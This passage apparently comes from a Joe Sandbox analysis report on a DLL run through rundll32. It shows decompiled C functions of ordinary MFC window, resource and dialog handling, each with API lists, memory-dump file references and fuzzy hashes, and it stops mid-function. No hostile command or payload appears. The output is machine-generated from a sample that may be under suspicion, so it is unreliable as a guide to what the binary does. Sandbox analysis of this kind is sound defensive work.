                                                                                                                                                                            0x1000cc47
                                                                                                                                                                            0x1000cc49
                                                                                                                                                                            0x1000cc4d
                                                                                                                                                                            0x1000cc4f
                                                                                                                                                                            0x1000cc54
                                                                                                                                                                            0x1000cc54
                                                                                                                                                                            0x1000cc49
                                                                                                                                                                            0x1000cc3e
                                                                                                                                                                            0x1000cc30
                                                                                                                                                                            0x1000cc10
                                                                                                                                                                            0x1000cc03
                                                                                                                                                                            0x1000cc5b
                                                                                                                                                                            0x1000cc60
                                                                                                                                                                            0x1000cc68
                                                                                                                                                                            0x1000cc6d
                                                                                                                                                                            0x1000cc6e
                                                                                                                                                                            0x1000cc6f
                                                                                                                                                                            0x1000cc74
                                                                                                                                                                            0x1000cc79
                                                                                                                                                                            0x1000cc7b
                                                                                                                                                                            0x1000cc7d
                                                                                                                                                                            0x1000cc7f
                                                                                                                                                                            0x1000cc83
                                                                                                                                                                            0x1000cc87
                                                                                                                                                                            0x1000cc8a
                                                                                                                                                                            0x1000cc8f
                                                                                                                                                                            0x1000cc93
                                                                                                                                                                            0x1000cc97
                                                                                                                                                                            0x1000cc97
                                                                                                                                                                            0x1000cc9b
                                                                                                                                                                            0x1000cca0
                                                                                                                                                                            0x1000cca0
                                                                                                                                                                            0x1000cca0
                                                                                                                                                                            0x1000cca2
                                                                                                                                                                            0x1000cca5
                                                                                                                                                                            0x1000ccb3
                                                                                                                                                                            0x1000ccb3
                                                                                                                                                                            0x1000cca5
                                                                                                                                                                            0x1000ccb8
                                                                                                                                                                            0x1000ccdb
                                                                                                                                                                            0x1000ccde
                                                                                                                                                                            0x1000cce4
                                                                                                                                                                            0x1000cce4
                                                                                                                                                                            0x1000cce9
                                                                                                                                                                            0x1000ccec
                                                                                                                                                                            0x1000ccf3
                                                                                                                                                                            0x1000ccf3
                                                                                                                                                                            0x1000ccf9
                                                                                                                                                                            0x1000ccfc
                                                                                                                                                                            0x1000cd04
                                                                                                                                                                            0x1000cd07
                                                                                                                                                                            0x1000cd0c
                                                                                                                                                                            0x1000cd0c
                                                                                                                                                                            0x1000cd07
                                                                                                                                                                            0x1000cd16
                                                                                                                                                                            0x1000cd1b
                                                                                                                                                                            0x1000cd20
                                                                                                                                                                            0x1000cd23
                                                                                                                                                                            0x1000cd28
                                                                                                                                                                            0x1000cd28
                                                                                                                                                                            0x1000cd2e
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1000cbd5
                                                                                                                                                                            0x1000cbd5
                                                                                                                                                                            0x1000cd31
                                                                                                                                                                            0x1000cd36
                                                                                                                                                                            0x1000cd36

                                                                                                                                                                            APIs
                                                                                                                                                                            • __EH_prolog3_catch.LIBCMT ref: 1000CB7B
                                                                                                                                                                            • FindResourceA.KERNEL32(?,?,00000005), ref: 1000CBAE
                                                                                                                                                                            • LoadResource.KERNEL32(?,00000000), ref: 1000CBB6
                                                                                                                                                                            • LockResource.KERNEL32(?,00000024,100014EC,00000000,AF9B6515), ref: 1000CBC7
                                                                                                                                                                            • GetDesktopWindow.USER32 ref: 1000CBFA
                                                                                                                                                                            • IsWindowEnabled.USER32(?), ref: 1000CC08
                                                                                                                                                                            • EnableWindow.USER32(?,00000000), ref: 1000CC17
                                                                                                                                                                              • Part of subcall function 100128F8: IsWindowEnabled.USER32(?), ref: 10012901
                                                                                                                                                                              • Part of subcall function 10012913: EnableWindow.USER32(?,AF9B6515), ref: 10012920
                                                                                                                                                                            • EnableWindow.USER32(?,00000001), ref: 1000CCF3
                                                                                                                                                                            • GetActiveWindow.USER32 ref: 1000CCFE
                                                                                                                                                                            • SetActiveWindow.USER32(?,?,00000024,100014EC,00000000,AF9B6515), ref: 1000CD0C
                                                                                                                                                                            • FreeResource.KERNEL32(?,?,00000024,100014EC,00000000,AF9B6515), ref: 1000CD28
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000003.00000002.254237600.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                            • Associated: 00000003.00000002.254232913.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000003.00000002.254260062.0000000010029000.00000002.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000003.00000002.254269049.0000000010032000.00000008.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000003.00000002.254289924.0000000010056000.00000004.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000003.00000002.254295503.000000001005A000.00000004.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000003.00000002.254300851.000000001005D000.00000002.00020000.sdmp Download File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Window$Resource$Enable$ActiveEnabled$DesktopFindFreeH_prolog3_catchLoadLock
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 1509511306-0
                                                                                                                                                                            • Opcode ID: 79ae930f89578103c1460a1015ac81056dc0f6867cd803f5cb3b8be9090631d6
                                                                                                                                                                            • Instruction ID: 8f78f448105f665873ac1cd7b5fa33a3343bcf420d8a1ae80c8a79bff85a7528
                                                                                                                                                                            • Opcode Fuzzy Hash: 79ae930f89578103c1460a1015ac81056dc0f6867cd803f5cb3b8be9090631d6
                                                                                                                                                                            • Instruction Fuzzy Hash: A251BF34A007098BFF11DFA5C999EAEBBF1EF44781F20002EE506A6195CB759E41CF55
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            C-Code - Quality: 96%
                                                                                                                                                                            			E10011245(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                                                                                                                                                                            				_Unknown_base(*)()* _t31;
                                                                                                                                                                            				void* _t33;
                                                                                                                                                                            				void* _t34;
                                                                                                                                                                            				void* _t40;
                                                                                                                                                                            				void* _t43;
                                                                                                                                                                            				void* _t60;
                                                                                                                                                                            				void* _t64;
                                                                                                                                                                            				struct HWND__* _t66;
                                                                                                                                                                            				CHAR* _t68;
                                                                                                                                                                            				void* _t71;
                                                                                                                                                                            
                                                                                                                                                                            				_t64 = __edx;
                                                                                                                                                                            				_t60 = __ecx;
                                                                                                                                                                            				_push(0x40);
                                                                                                                                                                            				E10017BF4(E1002864B, __ebx, __edi, __esi);
                                                                                                                                                                            				_t66 =  *(_t71 + 8);
                                                                                                                                                                            				_t68 = "AfxOldWndProc423";
                                                                                                                                                                            				_t31 = GetPropA(_t66, _t68);
                                                                                                                                                                            				 *(_t71 - 0x14) =  *(_t71 - 0x14) & 0x00000000;
                                                                                                                                                                            				 *(_t71 - 4) =  *(_t71 - 4) & 0x00000000;
                                                                                                                                                                            				 *(_t71 - 0x18) = _t31;
                                                                                                                                                                            				_t58 = 1;
                                                                                                                                                                            				_t33 =  *(_t71 + 0xc) - 6;
                                                                                                                                                                            				if(_t33 == 0) {
                                                                                                                                                                            					_t34 = E1000FB5C(1, _t60, _t71,  *(_t71 + 0x14));
                                                                                                                                                                            					E10011159(_t60, E1000FB5C(1, _t60, _t71, _t66),  *(_t71 + 0x10), _t34);
                                                                                                                                                                            					goto L9;
                                                                                                                                                                            				} else {
                                                                                                                                                                            					_t40 = _t33 - 0x1a;
                                                                                                                                                                            					if(_t40 == 0) {
                                                                                                                                                                            						_t58 = 0 | E100111CF(1, _t66, E1000FB5C(1, _t60, _t71, _t66),  *(_t71 + 0x14),  *(_t71 + 0x14) >> 0x10) == 0x00000000;
                                                                                                                                                                            						L9:
                                                                                                                                                                            						if(_t58 != 0) {
                                                                                                                                                                            							goto L10;
                                                                                                                                                                            						}
                                                                                                                                                                            					} else {
                                                                                                                                                                            						_t43 = _t40 - 0x62;
                                                                                                                                                                            						if(_t43 == 0) {
                                                                                                                                                                            							SetWindowLongA(_t66, 0xfffffffc,  *(_t71 - 0x18));
                                                                                                                                                                            							RemovePropA(_t66, _t68);
                                                                                                                                                                            							GlobalDeleteAtom(GlobalFindAtomA(_t68));
                                                                                                                                                                            							goto L10;
                                                                                                                                                                            						} else {
                                                                                                                                                                            							if(_t43 != 0x8e) {
                                                                                                                                                                            								L10:
                                                                                                                                                                            								 *(_t71 - 0x14) = CallWindowProcA( *(_t71 - 0x18), _t66,  *(_t71 + 0xc),  *(_t71 + 0x10),  *(_t71 + 0x14));
                                                                                                                                                                            							} else {
                                                                                                                                                                            								E1000E865(E1000FB5C(1, _t60, _t71, _t66), _t71 - 0x30, _t71 - 0x1c);
                                                                                                                                                                            								 *(_t71 - 0x14) = CallWindowProcA( *(_t71 - 0x18), _t66, 0x110,  *(_t71 + 0x10),  *(_t71 + 0x14));
                                                                                                                                                                            								E100100F3(1, _t64, _t49, _t71 - 0x30,  *((intOrPtr*)(_t71 - 0x1c)));
                                                                                                                                                                            							}
                                                                                                                                                                            						}
                                                                                                                                                                            					}
                                                                                                                                                                            				}
                                                                                                                                                                            				return E10017C60( *(_t71 - 0x14));
                                                                                                                                                                            			}













                                                                                                                                                                            0x10011245
                                                                                                                                                                            0x10011245
                                                                                                                                                                            0x10011245
                                                                                                                                                                            0x1001124c
                                                                                                                                                                            0x10011251
                                                                                                                                                                            0x10011254
                                                                                                                                                                            0x1001125b
                                                                                                                                                                            0x10011261
                                                                                                                                                                            0x10011265
                                                                                                                                                                            0x10011269
                                                                                                                                                                            0x10011271
                                                                                                                                                                            0x10011272
                                                                                                                                                                            0x10011275
                                                                                                                                                                            0x1001131e
                                                                                                                                                                            0x10011330
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1001127b
                                                                                                                                                                            0x1001127b
                                                                                                                                                                            0x1001127e
                                                                                                                                                                            0x10011316
                                                                                                                                                                            0x10011335
                                                                                                                                                                            0x10011337
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x10011280
                                                                                                                                                                            0x10011280
                                                                                                                                                                            0x10011283
                                                                                                                                                                            0x100112dc
                                                                                                                                                                            0x100112e4
                                                                                                                                                                            0x100112f2
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x10011285
                                                                                                                                                                            0x1001128a
                                                                                                                                                                            0x10011339
                                                                                                                                                                            0x1001134c
                                                                                                                                                                            0x10011290
                                                                                                                                                                            0x100112a1
                                                                                                                                                                            0x100112be
                                                                                                                                                                            0x100112c6
                                                                                                                                                                            0x100112c6
                                                                                                                                                                            0x1001128a
                                                                                                                                                                            0x10011283
                                                                                                                                                                            0x1001127e
                                                                                                                                                                            0x100112d3

                                                                                                                                                                            APIs
                                                                                                                                                                            • __EH_prolog3_catch.LIBCMT ref: 1001124C
                                                                                                                                                                            • GetPropA.USER32 ref: 1001125B
                                                                                                                                                                            • CallWindowProcA.USER32 ref: 100112B5
                                                                                                                                                                              • Part of subcall function 100100F3: GetWindowRect.USER32 ref: 1001011B
                                                                                                                                                                              • Part of subcall function 100100F3: GetWindow.USER32(?,00000004), ref: 10010138
                                                                                                                                                                            • SetWindowLongA.USER32 ref: 100112DC
                                                                                                                                                                            • RemovePropA.USER32 ref: 100112E4
                                                                                                                                                                            • GlobalFindAtomA.KERNEL32 ref: 100112EB
                                                                                                                                                                            • GlobalDeleteAtom.KERNEL32 ref: 100112F2
                                                                                                                                                                              • Part of subcall function 1000E865: GetWindowRect.USER32 ref: 1000E871
                                                                                                                                                                            • CallWindowProcA.USER32 ref: 10011346
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000003.00000002.254237600.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                            • Associated: 00000003.00000002.254232913.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000003.00000002.254260062.0000000010029000.00000002.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000003.00000002.254269049.0000000010032000.00000008.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000003.00000002.254289924.0000000010056000.00000004.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000003.00000002.254295503.000000001005A000.00000004.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000003.00000002.254300851.000000001005D000.00000002.00020000.sdmp Download File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Window$AtomCallGlobalProcPropRect$DeleteFindH_prolog3_catchLongRemove
                                                                                                                                                                            • String ID: AfxOldWndProc423
                                                                                                                                                                            • API String ID: 2702501687-1060338832
                                                                                                                                                                            • Opcode ID: 8fd6b985b15a6b43d9e50dafe11c9ce611adcf5e5826660702256a507342a875
                                                                                                                                                                            • Instruction ID: 0d19250562dc5a9dad551a697ef26f9b08052b09a3581b526b6705a222a2b98b
                                                                                                                                                                            • Opcode Fuzzy Hash: 8fd6b985b15a6b43d9e50dafe11c9ce611adcf5e5826660702256a507342a875
                                                                                                                                                                            • Instruction Fuzzy Hash: 2D317F7680021ABBDF05DFA0CD89EFF7FB9FF05651F100118F611A6051DB359A61ABA1
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            C-Code - Quality: 97%
                                                                                                                                                                            			E1000C984(void* __ebx, intOrPtr* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                                                                                                                                                                            				signed int _t65;
                                                                                                                                                                            				signed int _t72;
                                                                                                                                                                            				signed int _t74;
                                                                                                                                                                            				struct HWND__* _t75;
                                                                                                                                                                            				signed int _t78;
                                                                                                                                                                            				signed int _t95;
                                                                                                                                                                            				intOrPtr* _t103;
                                                                                                                                                                            				signed int _t110;
                                                                                                                                                                            				void* _t124;
                                                                                                                                                                            				signed int _t129;
                                                                                                                                                                            				DLGTEMPLATE* _t130;
                                                                                                                                                                            				struct HWND__* _t131;
                                                                                                                                                                            				void* _t132;
                                                                                                                                                                            
                                                                                                                                                                            				_t128 = __esi;
                                                                                                                                                                            				_t124 = __edx;
                                                                                                                                                                            				_t104 = __ecx;
                                                                                                                                                                            				_push(0x3c);
                                                                                                                                                                            				E10017BF4(E1002800E, __ebx, __edi, __esi);
                                                                                                                                                                            				_t103 = __ecx;
                                                                                                                                                                            				 *((intOrPtr*)(_t132 - 0x20)) = __ecx;
                                                                                                                                                                            				_t136 =  *(_t132 + 0x10);
                                                                                                                                                                            				if( *(_t132 + 0x10) == 0) {
                                                                                                                                                                            					 *(_t132 + 0x10) =  *(E1000D5EC(__ecx, 0, __esi, _t136) + 0xc);
                                                                                                                                                                            				}
                                                                                                                                                                            				_t129 =  *(E1000D5EC(_t103, 0, _t128, _t136) + 0x3c);
                                                                                                                                                                            				 *(_t132 - 0x28) = _t129;
                                                                                                                                                                            				 *(_t132 - 0x14) = 0;
                                                                                                                                                                            				 *(_t132 - 4) = 0;
                                                                                                                                                                            				E10012406(_t103, _t104, 0, _t129, _t136, 0x10);
                                                                                                                                                                            				E10012406(_t103, _t104, 0, _t129, _t136, 0x7c000);
                                                                                                                                                                            				if(_t129 == 0) {
                                                                                                                                                                            					_t130 =  *(_t132 + 8);
                                                                                                                                                                            					L7:
                                                                                                                                                                            					__eflags = _t130;
                                                                                                                                                                            					if(_t130 == 0) {
                                                                                                                                                                            						L4:
                                                                                                                                                                            						_t65 = 0;
                                                                                                                                                                            						L32:
                                                                                                                                                                            						return E10017C60(_t65);
                                                                                                                                                                            					}
                                                                                                                                                                            					E10009E23(_t132 - 0x1c, E10013479());
                                                                                                                                                                            					 *(_t132 - 4) = 1;
                                                                                                                                                                            					 *((intOrPtr*)(_t132 - 0x18)) = 0;
                                                                                                                                                                            					__eflags = E10014A97(__eflags, _t130, _t132 - 0x1c, _t132 - 0x18);
                                                                                                                                                                            					__eflags =  *0x1005aa84; // 0x0
                                                                                                                                                                            					_t72 = 0 | __eflags == 0x00000000;
                                                                                                                                                                            					if(__eflags == 0) {
                                                                                                                                                                            						L14:
                                                                                                                                                                            						__eflags = _t72;
                                                                                                                                                                            						if(__eflags == 0) {
                                                                                                                                                                            							L17:
                                                                                                                                                                            							 *(_t103 + 0x44) =  *(_t103 + 0x44) | 0xffffffff;
                                                                                                                                                                            							 *(_t103 + 0x3c) =  *(_t103 + 0x3c) | 0x00000010;
                                                                                                                                                                            							E100115DC(0, __eflags, _t103);
                                                                                                                                                                            							_t74 =  *(_t132 + 0xc);
                                                                                                                                                                            							__eflags = _t74;
                                                                                                                                                                            							if(_t74 != 0) {
                                                                                                                                                                            								_t75 =  *(_t74 + 0x20);
                                                                                                                                                                            							} else {
                                                                                                                                                                            								_t75 = 0;
                                                                                                                                                                            							}
                                                                                                                                                                            							_t131 = CreateDialogIndirectParamA( *(_t132 + 0x10), _t130, _t75, E1000C402, 0);
                                                                                                                                                                            							E10009CB7( *((intOrPtr*)(_t132 - 0x1c)) + 0xfffffff0, _t124);
                                                                                                                                                                            							 *(_t132 - 4) =  *(_t132 - 4) | 0xffffffff;
                                                                                                                                                                            							_t110 =  *(_t132 - 0x28);
                                                                                                                                                                            							__eflags = _t110;
                                                                                                                                                                            							if(__eflags != 0) {
                                                                                                                                                                            								 *((intOrPtr*)( *_t110 + 0x18))(_t132 - 0x48);
                                                                                                                                                                            								__eflags = _t131;
                                                                                                                                                                            								if(__eflags != 0) {
                                                                                                                                                                            									 *((intOrPtr*)( *_t103 + 0x12c))(0);
                                                                                                                                                                            								}
                                                                                                                                                                            							}
                                                                                                                                                                            							_t78 = E1000FC04(_t103, 0, __eflags);
                                                                                                                                                                            							__eflags = _t78;
                                                                                                                                                                            							if(_t78 == 0) {
                                                                                                                                                                            								 *((intOrPtr*)( *_t103 + 0x114))();
                                                                                                                                                                            							}
                                                                                                                                                                            							__eflags = _t131;
                                                                                                                                                                            							if(_t131 != 0) {
                                                                                                                                                                            								__eflags =  *(_t103 + 0x3c) & 0x00000010;
                                                                                                                                                                            								if(( *(_t103 + 0x3c) & 0x00000010) == 0) {
                                                                                                                                                                            									DestroyWindow(_t131);
                                                                                                                                                                            									_t131 = 0;
                                                                                                                                                                            									__eflags = 0;
                                                                                                                                                                            								}
                                                                                                                                                                            							}
                                                                                                                                                                            							__eflags =  *(_t132 - 0x14);
                                                                                                                                                                            							if( *(_t132 - 0x14) != 0) {
                                                                                                                                                                            								GlobalUnlock( *(_t132 - 0x14));
                                                                                                                                                                            								GlobalFree( *(_t132 - 0x14));
                                                                                                                                                                            							}
                                                                                                                                                                            							__eflags = _t131;
                                                                                                                                                                            							_t59 = _t131 != 0;
                                                                                                                                                                            							__eflags = _t59;
                                                                                                                                                                            							_t65 = 0 | _t59;
                                                                                                                                                                            							goto L32;
                                                                                                                                                                            						}
                                                                                                                                                                            						L15:
                                                                                                                                                                            						E10014A60(_t103, _t132 - 0x38, 0, _t132, _t130);
                                                                                                                                                                            						 *(_t132 - 4) = 2;
                                                                                                                                                                            						E100149BE(_t132 - 0x38,  *((intOrPtr*)(_t132 - 0x18)));
                                                                                                                                                                            						 *(_t132 - 0x14) = E100146D7(_t132 - 0x38);
                                                                                                                                                                            						 *(_t132 - 4) = 1;
                                                                                                                                                                            						E100146C9(_t132 - 0x38);
                                                                                                                                                                            						__eflags =  *(_t132 - 0x14);
                                                                                                                                                                            						if(__eflags != 0) {
                                                                                                                                                                            							_t130 = GlobalLock( *(_t132 - 0x14));
                                                                                                                                                                            						}
                                                                                                                                                                            						goto L17;
                                                                                                                                                                            					}
                                                                                                                                                                            					__eflags = _t72;
                                                                                                                                                                            					if(_t72 != 0) {
                                                                                                                                                                            						goto L15;
                                                                                                                                                                            					}
                                                                                                                                                                            					__eflags = GetSystemMetrics(0x2a);
                                                                                                                                                                            					if(__eflags == 0) {
                                                                                                                                                                            						goto L17;
                                                                                                                                                                            					}
                                                                                                                                                                            					_t95 = E1000C95C(_t132 - 0x1c, "MS Shell Dlg");
                                                                                                                                                                            					__eflags = _t95;
                                                                                                                                                                            					_t72 = 0 | _t95 == 0x00000000;
                                                                                                                                                                            					__eflags = _t72;
                                                                                                                                                                            					if(__eflags == 0) {
                                                                                                                                                                            						goto L17;
                                                                                                                                                                            					}
                                                                                                                                                                            					__eflags =  *((short*)(_t132 - 0x18)) - 8;
                                                                                                                                                                            					if( *((short*)(_t132 - 0x18)) == 8) {
                                                                                                                                                                            						 *((intOrPtr*)(_t132 - 0x18)) = 0;
                                                                                                                                                                            					}
                                                                                                                                                                            					goto L14;
                                                                                                                                                                            				}
                                                                                                                                                                            				_push(_t132 - 0x48);
                                                                                                                                                                            				if( *((intOrPtr*)( *_t103 + 0x12c))() != 0) {
                                                                                                                                                                            					_t130 =  *((intOrPtr*)( *_t129 + 0x14))(_t132 - 0x48,  *(_t132 + 8));
                                                                                                                                                                            					goto L7;
                                                                                                                                                                            				}
                                                                                                                                                                            				goto L4;
                                                                                                                                                                            			}
















                                                                                                                                                                            0x1000c984
                                                                                                                                                                            0x1000c984
                                                                                                                                                                            0x1000c984
                                                                                                                                                                            0x1000c984
                                                                                                                                                                            0x1000c98b
                                                                                                                                                                            0x1000c990
                                                                                                                                                                            0x1000c992
                                                                                                                                                                            0x1000c997
                                                                                                                                                                            0x1000c99a
                                                                                                                                                                            0x1000c9a4
                                                                                                                                                                            0x1000c9a4
                                                                                                                                                                            0x1000c9ac
                                                                                                                                                                            0x1000c9b1
                                                                                                                                                                            0x1000c9b4
                                                                                                                                                                            0x1000c9b7
                                                                                                                                                                            0x1000c9ba
                                                                                                                                                                            0x1000c9c4
                                                                                                                                                                            0x1000c9cb
                                                                                                                                                                            0x1000c9f8
                                                                                                                                                                            0x1000c9fb
                                                                                                                                                                            0x1000c9fb
                                                                                                                                                                            0x1000c9fd
                                                                                                                                                                            0x1000c9df
                                                                                                                                                                            0x1000c9df
                                                                                                                                                                            0x1000cb6c
                                                                                                                                                                            0x1000cb71
                                                                                                                                                                            0x1000cb71
                                                                                                                                                                            0x1000ca08
                                                                                                                                                                            0x1000ca16
                                                                                                                                                                            0x1000ca1a
                                                                                                                                                                            0x1000ca27
                                                                                                                                                                            0x1000ca2c
                                                                                                                                                                            0x1000ca32
                                                                                                                                                                            0x1000ca34
                                                                                                                                                                            0x1000ca6a
                                                                                                                                                                            0x1000ca6a
                                                                                                                                                                            0x1000ca6c
                                                                                                                                                                            0x1000caad
                                                                                                                                                                            0x1000caad
                                                                                                                                                                            0x1000cab1
                                                                                                                                                                            0x1000cab6
                                                                                                                                                                            0x1000cabb
                                                                                                                                                                            0x1000cabe
                                                                                                                                                                            0x1000cac0
                                                                                                                                                                            0x1000cac6
                                                                                                                                                                            0x1000cac2
                                                                                                                                                                            0x1000cac2
                                                                                                                                                                            0x1000cac2
                                                                                                                                                                            0x1000cae0
                                                                                                                                                                            0x1000cae2
                                                                                                                                                                            0x1000cae7
                                                                                                                                                                            0x1000cb09
                                                                                                                                                                            0x1000cb0c
                                                                                                                                                                            0x1000cb0e
                                                                                                                                                                            0x1000cb16
                                                                                                                                                                            0x1000cb19
                                                                                                                                                                            0x1000cb1b
                                                                                                                                                                            0x1000cb22
                                                                                                                                                                            0x1000cb22
                                                                                                                                                                            0x1000cb1b
                                                                                                                                                                            0x1000cb28
                                                                                                                                                                            0x1000cb2d
                                                                                                                                                                            0x1000cb2f
                                                                                                                                                                            0x1000cb35
                                                                                                                                                                            0x1000cb35
                                                                                                                                                                            0x1000cb3b
                                                                                                                                                                            0x1000cb3d
                                                                                                                                                                            0x1000cb3f
                                                                                                                                                                            0x1000cb43
                                                                                                                                                                            0x1000cb46
                                                                                                                                                                            0x1000cb4c
                                                                                                                                                                            0x1000cb4c
                                                                                                                                                                            0x1000cb4c
                                                                                                                                                                            0x1000cb43
                                                                                                                                                                            0x1000cb4e
                                                                                                                                                                            0x1000cb51
                                                                                                                                                                            0x1000cb56
                                                                                                                                                                            0x1000cb5f
                                                                                                                                                                            0x1000cb5f
                                                                                                                                                                            0x1000cb67
                                                                                                                                                                            0x1000cb69
                                                                                                                                                                            0x1000cb69
                                                                                                                                                                            0x1000cb69
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1000cb69
                                                                                                                                                                            0x1000ca6e
                                                                                                                                                                            0x1000ca72
                                                                                                                                                                            0x1000ca7d
                                                                                                                                                                            0x1000ca81
                                                                                                                                                                            0x1000ca91
                                                                                                                                                                            0x1000ca94
                                                                                                                                                                            0x1000ca98
                                                                                                                                                                            0x1000ca9d
                                                                                                                                                                            0x1000caa0
                                                                                                                                                                            0x1000caab
                                                                                                                                                                            0x1000caab
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1000caa0
                                                                                                                                                                            0x1000ca36
                                                                                                                                                                            0x1000ca38
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1000ca42
                                                                                                                                                                            0x1000ca44
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1000ca4e
                                                                                                                                                                            0x1000ca55
                                                                                                                                                                            0x1000ca5a
                                                                                                                                                                            0x1000ca5c
                                                                                                                                                                            0x1000ca5e
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1000ca60
                                                                                                                                                                            0x1000ca65
                                                                                                                                                                            0x1000ca67
                                                                                                                                                                            0x1000ca67
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1000ca65
                                                                                                                                                                            0x1000c9d2
                                                                                                                                                                            0x1000c9dd
                                                                                                                                                                            0x1000c9f4
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1000c9f4
                                                                                                                                                                            0x00000000

                                                                                                                                                                            APIs
                                                                                                                                                                            • __EH_prolog3_catch.LIBCMT ref: 1000C98B
                                                                                                                                                                            • GetSystemMetrics.USER32 ref: 1000CA3C
                                                                                                                                                                            • GlobalLock.KERNEL32 ref: 1000CAA5
                                                                                                                                                                            • CreateDialogIndirectParamA.USER32(?,?,?,1000C402,00000000), ref: 1000CAD4
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000003.00000002.254237600.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                            • Associated: 00000003.00000002.254232913.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000003.00000002.254260062.0000000010029000.00000002.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000003.00000002.254269049.0000000010032000.00000008.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000003.00000002.254289924.0000000010056000.00000004.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000003.00000002.254295503.000000001005A000.00000004.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000003.00000002.254300851.000000001005D000.00000002.00020000.sdmp Download File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: CreateDialogGlobalH_prolog3_catchIndirectLockMetricsParamSystem
                                                                                                                                                                            • String ID: MS Shell Dlg
                                                                                                                                                                            • API String ID: 1736106359-76309092
                                                                                                                                                                            • Opcode ID: 0836612ccd89b939986456284b221daff64c2c444739792d891f2b66984f1eb5
                                                                                                                                                                            • Instruction ID: aca18bfbc2af702d8352a65e986f2fe47acd8ccb78c3dcc49b793ffb13d9be50
                                                                                                                                                                            • Opcode Fuzzy Hash: 0836612ccd89b939986456284b221daff64c2c444739792d891f2b66984f1eb5
                                                                                                                                                                            • Instruction Fuzzy Hash: AF51A031A0020D9FDB05DFA4C88ADEEBBB4EF45780F254559F442EB199DB349E81CB52
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            C-Code - Quality: 95%
                                                                                                                                                                            			E100149BE(intOrPtr __ecx, signed int _a4) {
                                                                                                                                                                            				signed int _v8;
                                                                                                                                                                            				char _v40;
                                                                                                                                                                            				void _v68;
                                                                                                                                                                            				intOrPtr _v72;
                                                                                                                                                                            				void* __ebx;
                                                                                                                                                                            				void* __edi;
                                                                                                                                                                            				void* __esi;
                                                                                                                                                                            				signed int _t12;
                                                                                                                                                                            				void* _t14;
                                                                                                                                                                            				char* _t23;
                                                                                                                                                                            				void* _t29;
                                                                                                                                                                            				signed short _t30;
                                                                                                                                                                            				struct HDC__* _t31;
                                                                                                                                                                            				signed int _t32;
                                                                                                                                                                            
                                                                                                                                                                            				_t12 =  *0x10057a08; // 0xaf9b6515
                                                                                                                                                                            				_v8 = _t12 ^ _t32;
                                                                                                                                                                            				_t31 = GetStockObject;
                                                                                                                                                                            				_t30 = 0xa;
                                                                                                                                                                            				_v72 = __ecx;
                                                                                                                                                                            				_t23 = "System";
                                                                                                                                                                            				_t14 = GetStockObject(0x11);
                                                                                                                                                                            				if(_t14 != 0) {
                                                                                                                                                                            					L2:
                                                                                                                                                                            					if(GetObjectA(_t14, 0x3c,  &_v68) != 0) {
                                                                                                                                                                            						_t23 =  &_v40;
                                                                                                                                                                            						_t31 = GetDC(0);
                                                                                                                                                                            						if(_v68 < 0) {
                                                                                                                                                                            							_v68 =  ~_v68;
                                                                                                                                                                            						}
                                                                                                                                                                            						_t30 = MulDiv(_v68, 0x48, GetDeviceCaps(_t31, 0x5a)) & 0x0000ffff;
                                                                                                                                                                            						ReleaseDC(0, _t31);
                                                                                                                                                                            					}
                                                                                                                                                                            					L6:
                                                                                                                                                                            					_t16 = _a4;
                                                                                                                                                                            					if(_a4 == 0) {
                                                                                                                                                                            						_t16 = _t30 & 0x0000ffff;
                                                                                                                                                                            					}
